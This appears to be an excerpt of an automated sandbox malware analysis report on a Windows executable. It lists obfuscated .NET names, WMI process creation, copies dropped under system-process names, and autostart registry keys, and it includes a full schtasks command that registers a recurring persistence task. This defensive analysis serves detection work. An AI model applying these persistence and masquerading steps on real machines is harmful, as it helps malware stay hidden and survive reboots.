Source: B9exXW7c3t.exe, YILP2PIiy7TsqXFB73a.cs	High entropy of concatenated method names: 'abTcSnC5Ma', 'K1WcJ4E9Ja', 'x0LcfAP7KA', 'qqRDByUB74WjoJ667C4', 'j0a7oZUKBYSCXgUmFiD', 'QNZPyrUs7n8YCJ0G7YY', 'qcwEcNUJlvviscAYrf2', 'SAVSyQUniMW2pxcH3pU', 'eADVTbUyLZYnm3l4yNI', 'gR4V6oU3rxv4Sgx3RAK'
Source: B9exXW7c3t.exe, wfE2ZheU3rjm6WDQs8G.cs	High entropy of concatenated method names: 'DjMIz9P3oV', 'R6karHBSZv', 'vocayHhL89', 'HOIaeOPbwL', 'YqVaIIc6cI', 'M9OaaJMsGN', 'cxKaQkvjiM', 'QpHaD7Y5xN', 'tdDassxhsj', 'njYac3V308'
Source: B9exXW7c3t.exe, S7RcMj5GewkMLW7HHZ.cs	High entropy of concatenated method names: 'sEoCx7u2T', 'c2W8giJ59', 'GMPqKcQ4a', 'EXI6a0p10', 'GZhKIYb34', 'f2ORHLjmV', 'Yf5gAy7OM', 'F2Ye9oWuOHxm7Akd7JB', 'aUmxFXWONugb7vAbLwA', 'jFsP4UWjjBgFA6LbhID'
Source: B9exXW7c3t.exe, VFHhlDIaTcun5k9rVEK.cs	High entropy of concatenated method names: 'JPlsjXygNB', 'RT3s3mExSQ', 'crHsMZlMyX', 'XCxshkRbNa', 'c5vslOAEUI', 'iYTsYpbdR0', 'Qywc4S18umOC2uKYpFc', 'G1CDj41RjgEU7INhbSj', 'ktftwh1xrHpOJqBZAcW', 'gGshwa1ZRKkOBJt4JoP'
Source: B9exXW7c3t.exe, AtRTcRdgpgwtmbTeZ9.cs	High entropy of concatenated method names: '_4I7', '_7WJ', '_98d', 'B28', 'rfoZNStJFRmmEp2Efxk', 'hC9G3jtnlYXciuUfDXF', 'Ay9EestyBahaxSmhmNF', 'jHwW5Ct38hp4LcwtjOd', 'FcmRr8tmCylqhb6Sc61', 'K9auh3tzQGiECeBocqa'
Source: B9exXW7c3t.exe, heBkKPDR8rfL8ZFJuHG.cs	High entropy of concatenated method names: 'z6M6XRmIL8', 'XcV6BbM4Ls', 'fUX6HHeaAS', 'U1s', 'yYS', '_79P', '_5lh', 'j46', 'J63', 'Eac6Feeti4'
Source: B9exXW7c3t.exe, cBiUpPQ2mJQjRA2VPxG.cs	High entropy of concatenated method names: 'dJYKDyrhDR4a4i5WoET', 'ygB6NUrIw8P8gseGB9H', 'lOwXWXrOCgsXk8xDG2t', 'FkqMhGrjbrdsj8vq4ef', 'aUmjbdrLHcMHyOH5aOm', 'AGKQLlrAu2VTIY6j1M5', 'Kxrohcr2MxqbfFHajNp'
Source: B9exXW7c3t.exe, iK1PBTy0DZcte5526xp.cs	High entropy of concatenated method names: '_4wN', '_7WJ', '_526', 'B28', 'jkDyGfuZ8vjX37cTkHc', 'W31eQbuE06vWbWGDPjd', 'uOwRu9urUNXSUufYp0t', 'Vn7HZnuv8BqApDMpQcZ', 'gKoBkUukVDRNvtGaqPI', 'w7xUafuMLbgLFske9Pb'
Source: B9exXW7c3t.exe, JL9XxPyZk4oMn89mDKI.cs	High entropy of concatenated method names: 'CpgeywtmbT', 'bZ9eeK9Aii', 'YmWeIN08Df', 'tAjnGVjKAiUIKRbjGCF', 'SloxiYjsvBieg4qOJWm', 'ohFdc8jTaOa5GQPHjgS', 'aVHEq3jBDflRuB4C765', 'jkI77BjJTFmcjRBUtTU', 'g4nP6DjnMXMIeE3ASnS', 'KuIP2KjyZxMZKc6D7MQ'
Source: B9exXW7c3t.exe, hmyn3ladGjtmY0PXyJe.cs	High entropy of concatenated method names: 'b67', '_943', '_2E2', 'P9S', '_7KZ', '_184', 'm97', '_2RG', 'wsE', 'o96'
Source: B9exXW7c3t.exe, htkArdQ6NrqAw87T4Gc.cs	High entropy of concatenated method names: 'DJkC2y7k0l', 'WgjCwZfWWg', 'zsbCZyRRfP', 'oX0CjhXYQ6', 'sjGC3F3SMQ', 'VVCsQ7ExkDFMCytr1Rg', 'xqgt27ECfRTiABBgefx', 'xsBkGTERRNri0jqiUSP', 'atZ4LVE82p6HjABq2ye', 'utV477EZWvY50Fmsb5q'
Source: B9exXW7c3t.exe, N5BI93embASvlxHuglj.cs	High entropy of concatenated method names: 'OKwItGltI8', 'trshjN2u3ZFl9SdFFVq', 'pkDqQ02OwmCZF6rSZGv', 'I24SC52of9P1RTTVNkc', 'qF4nqB2QXlkvgYgmfEH', 'LlnCsM2jKfdMHKheITf', 'Dllja62hwi5tnT1uFNj', 'IuDjZw2ISNaePu6k6I1', 'i35lew2LlyF3Emtbnty', 'K8QaES2AR3i1V2jB5yb'
Source: B9exXW7c3t.exe, PaZADdyHWjqwBqSVHyZ.cs	High entropy of concatenated method names: '_71I', '_7WJ', 'TO2', 'B28', 'N2oDOTQGyFHKNuKIJDf', 'gLN6cUQUXJmrN6qhImv', 'FA5X9xQ6VtHcRFB40eK', 'M4LuEFQdgw5YkQfVILQ', 'BAt2BtQFCStelwRShQA', 'OIN0aRQYxHuvmNQFK73'
Source: B9exXW7c3t.exe, UquGLgyyc7PQ19LiibV.cs	High entropy of concatenated method names: 'sf4', '_7WJ', 'xcX', 'B28', 'WLZwJYoGrtBuVllDxk0', 'Bcrp8woU1tuKh6txIM8', 'I70f2So6goD3pLxmrpk', 'SHKB9DodtFLb4OG05UC', 'dgIrcYoFSnDeRn3bvYj', 'mHXPHNoYQq3ya9E66Si'
Source: B9exXW7c3t.exe, BYvNKDSA7xbpvbZa6F.cs	High entropy of concatenated method names: '_695', '_7WJ', '_472', 'B28', 'arCmmAtoQOD2eFcw5kv', 'nQQAK3tQ31v4JHk3PrR', 'fVwbJNtucHP6FKKcoPT', 'hQ4FqQtOw3AdF1EfS2Z', 'Dow0OWtjJ0uKK07P5cf', 'GV2sCmthvdfFUZTu7Q9'
Source: B9exXW7c3t.exe, Y3oVS6yAkHBSZv5ocHh.cs	High entropy of concatenated method names: '_3B5', '_7WJ', 'D4o', 'B28', 'rnge6ThTQ5RwtuKuU8y', 'JGcBW8hBiFdH8StCpV5', 'fucytShKUMS2pB9fxHk', 'tGA2YPhs9AlNj6LGfFy', 'vKfwDshJhHPkyjSkNCs', 'DteGouhntP0UvRp6v3r'
Source: B9exXW7c3t.exe, hH4WNrDJgnywXm9Q5gV.cs	High entropy of concatenated method names: 'GT0g5PLYrV', 'W4y', '_854', 'lF2', 'xOCg0MLnyl', 'e61', 'uTxgCDKTbi', 'Baag8JwgoS', 'ft5', 'oPUgqPodEB'
Source: B9exXW7c3t.exe, Kntdd4yvSx6ZuTsmr5W.cs	High entropy of concatenated method names: 'f6YydEf1Lv', 'r3A8qdjrpSIYW0bqtRd', 'PblOH9jvLYNuaImCASF', 'XGVUGcjZ0Tr5hqscSdy', 'm2QU5ujEcZ4c2bYdauk', 'ewquNkjky2lKQai4JaK', '_314', '_7WJ', 'IO3', 'B28'
Source: B9exXW7c3t.exe, GTbGbJIm5k9fjQ9noHB.cs	High entropy of concatenated method names: 'ImDc3fW1m4', 'PTTcMFeLUi', 'nXbchNLvEb', 'muSclyoU54', 'jbvEUWUvJO1aHobAWmV', 'ulxMO7UksrOpe19qJXx', 'w9k3eqUM0ERwD9ByKpl', 'tMbKbhUEvswwc01nEGE', 'KdrAVjUryZlZ8Px5vUP', 'G6bSpYU4SDWA3WBqQrA'
Source: B9exXW7c3t.exe, WoeuIyatIsWlEhE4Goc.cs	High entropy of concatenated method names: 'TnH18bOXEH', 'ccq168n8kp', 'Fos1kr1k0e', 'S2a1mG48EW', 'PO511epkCm', 'wZL1iUDE54', 'KGR1LDGE6y', 'hnH1OBJC95', 'ov31UAePd7', 'kRe14Xt08D'
Source: B9exXW7c3t.exe, zhCNGyIA4pNxDM5nw42.cs	High entropy of concatenated method names: '_7n5', 'iS6', 'mlud61GcAw', 'OSX', 'AYIdF0XmV9', 'tLM2B8F3HSjSRcQHmXT', 'EdBSAEFm5ALHWGnfl6e', 'CSoCdMFzIPUwvEgDgqR', 'aN5OmNYPtadF6j65O7M', 'p8UWOTYWf2nwRCHQkwU'
Source: B9exXW7c3t.exe, ggf8GrIB4rduUidIC8N.cs	High entropy of concatenated method names: 'U7Dcx6ulTM', 'bHtcuVW7oL', 'RQQcE5jvnW', 'XNT8BcU52FSUSD5SVtE', 'L8ejKPUeS6O0XpCiEOU', 'wLA3F3UwPv85cbNloiq', 'mWxCVpU16bDUvWKXyhg', 'VxDc1M5nw4', 'JnCciBgbxm', 'urccLR4UQF'
Source: B9exXW7c3t.exe, lmUQtRlswqIH8kYN1G.cs	High entropy of concatenated method names: 'a2n', '_7WJ', 'Xk2', 'B28', 'cmMqh9Xbbv6mrKmenDy', 'xqPfxfXfmxPvELDOR55', 'C7ZY5eXSxy25GbP6yCC', 'DYHjfmXqrggQkaiifQc', 'f4A36BXiBCywqYJFpC6', 'DiPgVFX9ALtdeZWkkyh'
Source: B9exXW7c3t.exe, v7ax95yTu1qmfFeJ8Cw.cs	High entropy of concatenated method names: '_88F', '_7WJ', '_461', 'B28', 'yLKGEkuc4joWjFe6kQA', 'opirSRuNKEBv9j1rKZN', 'WMkxT7uVw6pIPHVoZH4', 'uXI30Qua0qTJbb1t2k2', 'J3kPnhuH4576xwo0LQR', 'ziMD8sulT7wrkhe667j'
Source: B9exXW7c3t.exe, Ku36I3IjpVunVO0eJww.cs	High entropy of concatenated method names: '_9Yl', 'Q1xdsPW3nN', 'JuGXdF72l1', 'DiudfiELui', 'lAchntdJ9MJ7B6HwQd6', 'HByHuVdn3i4d8LSJCx4', 'XjZccidy8bhx52L2Baj', 'td8ESBdKI50wOnqiFLs', 'xIIJWwdsYHtivn8cegR', 'VgxYP3d3icPlO2ao3tQ'
Source: B9exXW7c3t.exe, uXQyJVfDCvhLGKPylU.cs	High entropy of concatenated method names: 'P1z', '_7WJ', '_5Ch', 'B28', 'F3Y3Qut05SccafG5H2s', 'BuSKrftgFmmmiDpjVyo', 'CUNlultedGGtL7WnsUY', 'o0PLdqtwdKfo85uiEOs', 'I3MZnnt5BycmeDMBH2O', 'p8WrrDt1rT4OFnyb5C2'
Source: B9exXW7c3t.exe, XhtFW7QnXI11jUpgjMc.cs	High entropy of concatenated method names: 'EN8', '_441', 'eR1', '_284', 'V32', '_8BX', 'Yh5', 'Kg3', 'n91', 'y2f'
Source: B9exXW7c3t.exe, q3UK9hQRPO6AgaAY5Pk.cs	High entropy of concatenated method names: 'xnPCMgHY92', 'g7UChb53iQ', 'sgdCl1ZyQO', 'QK9NrdEMwSu8MYqJkST', 'dKnWoDEvV3DOxHrYyUI', 'vnwFxHEkX4YeCoMW9kP', 'wRkKffE4UobaIFAIDSK', 'PuXN3vEbTW5PDWKAZ78'
Source: B9exXW7c3t.exe, XleMGKewg6M5wFrx09t.cs	High entropy of concatenated method names: 'aStDcpGIto', 'NdVDXGBGuU', 'c09fVO5PgY1eUd9tJsC', 'hinc505WTTdJ0WTH9Yd', 'f1K1hawmMOtmPo8Cgmg', 'cZS1nwwzosgptUa5gDX', 'tjnDLb3hoM', 'UuNCo15ogIjteAQJBAp', 'jYgeV55Q3HLHtvNkTJX', 'Lq0xsi5XWyKnFsS6Cm7'
Source: B9exXW7c3t.exe, HJYgoTysyOgZAu7UtVa.cs	High entropy of concatenated method names: '_155', '_7WJ', 'viq', 'B28', 'yXWnbBonlRU72v94kcI', 'e4OvvUoyJwTH1mSjpE1', 'TZvCGNo305Cm90aa2y3', 'zQXr2jomVDtmMEY9wZ2', 'ElIPWgozXZXTv2ToXrB', 'kIS80DQPeH53ZYkHynZ'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\B9exXW7c3t.exe

Executable created and started: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe

Jump to behavior

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	File created: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	File created: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	File created: C:\Users\Default\Links\ApplicationFrameHost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	File created: C:\Users\Default\Saved Games\QeWHGGzCXwoQygZUiDI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	File created: C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	File created: C:\Program Files\Windows Mail\ctfmon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	File created: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Jump to dropped file

Source: C:\Users\user\Desktop\B9exXW7c3t.exe

File created: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe

Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Users\user\Desktop\B9exXW7c3t.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI

Jump to behavior

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI "C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe"			Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI "C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe"			Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\B9exXW7c3t.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 14 /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe'" /f

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	File created: C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	File created: C:\Users\user\Start Menu\Programs\Windows PowerShell\2e26acd4fd0504	Jump to behavior

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI	Jump to behavior

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
